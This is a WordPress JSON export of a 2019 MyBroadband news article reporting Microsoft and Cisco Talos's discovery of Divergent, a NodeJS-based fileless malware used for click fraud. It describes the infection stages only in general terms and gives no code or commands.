{"id":321614,"date":"2019-09-30T09:30:04","date_gmt":"2019-09-30T07:30:04","guid":{"rendered":"https:\/\/mybroadband.co.za\/news\/?p=321614"},"modified":"2019-09-30T09:32:00","modified_gmt":"2019-09-30T07:32:00","slug":"new-malware-uses-existing-programs-to-control-pcs","status":"publish","type":"post","link":"https:\/\/mybroadband.co.za\/news\/security\/321614-new-malware-uses-existing-programs-to-control-pcs.html","title":{"rendered":"New malware uses existing programs to control PCs"},"content":{"rendered":"<p><a href=\"https:\/\/www.microsoft.com\/security\/blog\/2019\/09\/26\/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware\/?ranMID=24542&amp;ranEAID=tv2R4u9rImY&amp;ranSiteID=tv2R4u9rImY-1EXkWED_.vGbUsduWKgaBg&amp;epi=tv2R4u9rImY-1EXkWED_.vGbUsduWKgaBg&amp;irgwc=1&amp;OCID=AID2000142_aff_7593_1243925&amp;tduid=(ir__ohhn9a13dgkfrlspkk0sohz30n2xg1dksdofxd0m00)(7593)(1243925)(tv2R4u9rImY-1EXkWED_.vGbUsduWKgaBg)()&amp;irclickid=_ohhn9a13dgkfrlspkk0sohz30n2xg1dksdofxd0m00\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Microsoft<\/strong><\/a> and Cisco&#8217;s <a href=\"https:\/\/blog.talosintelligence.com\/2019\/09\/divergent-analysis.html\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Talos<\/strong><\/a> have uncovered a new form of malware known as Divergent which lets malicious parties use the victim&#8217;s PC for illegal activities such as click fraud.<\/p>\n<p>Divergent uses existing programs to achieve its malicious goals, such as those already present in Windows or downloaded from third parties.<\/p>\n<p>&#8220;This threat uses NodeJS \u2014 a program that executes JavaScript outside of a web browser \u2014 as well as the legitimate open-source utility WinDivert to facilitate some of the functionality in the Divergent malware,&#8221; said Talos.<\/p>\n<p>Talos added that the use of NodeJS is not something commonly seen across malware families, which makes Divergent an interesting development.<\/p>\n<p>However, it shares many similarities with other popular fileless malware families, including Kovter.<\/p>\n<h3 class=\"my-4\">How it works<\/h3>\n<p>&#8220;When first delivered and executed on a victim&#8217;s machine, the malware is in the portable executable (PE) format. Its first task, however, is to install itself to the system in a less suspicious form, namely as an HTML Application (HTA) that will load the malware from the registry,&#8221; said Talos.<\/p>\n<p>Once installed, a series of events occur:<\/p>\n<ul>\n<li>The initial JavaScript file downloads a second JavaScript file.<\/li>\n<li>This second JavaScript file runs a PowerShell command which downloads several malicious tools<\/li>\n<li>These tools include the ability to disable Windows Defender, attain more control of the PC, and create a proxy.<\/li>\n<\/ul>\n<p>Talos believes that the malware was designed for typical cybercrime rather than for government-sanctioned attacks.<\/p>\n<p>It added that Divergent was probably designed to be used predominantly for click fraud, using the computers of everyday European and US consumers to increase ad revenue.<\/p>\n<h3 class=\"my-4\">Now read: <a href=\"https:\/\/mybroadband.co.za\/news\/motoring\/321610-huge-wave-of-account-hijackings-targets-youtube-users.html\" rel=\"bookmark\">Huge wave of account hijackings targets YouTube users<\/a><\/h3>\n","protected":false},"excerpt":{"rendered":"<p>Microsoft and Cisco&#8217;s Talos have uncovered a new form of malware &#8211; known as Divergent &#8211; which lets malicious parties use the victim&#8217;s PC for illegal activities such as click fraud.<\/p>\n","protected":false},"author":341039,"featured_media":89863,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[27],"tags":[61156,61154,123,61152],"class_list":["post-321614","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security","tag-click-fraud","tag-divergent","tag-microsoft","tag-talos"],"_links":{"self":[{"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/posts\/321614"}],"collection":[{"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/users\/341039"}],"replies":[{"embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/comments?post=321614"}],"version-history":[{"count":1,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/posts\/321614\/revisions"}],"predecessor-version":[{"id":321626,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/posts\/321614\/revisions\/321626"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/media\/89863"}],"wp:attachment":[{"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/media?parent=321614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/categories?post=321614"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mybroadband.co.za\/news\/wp-json\/wp\/v2\/tags?post=321614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}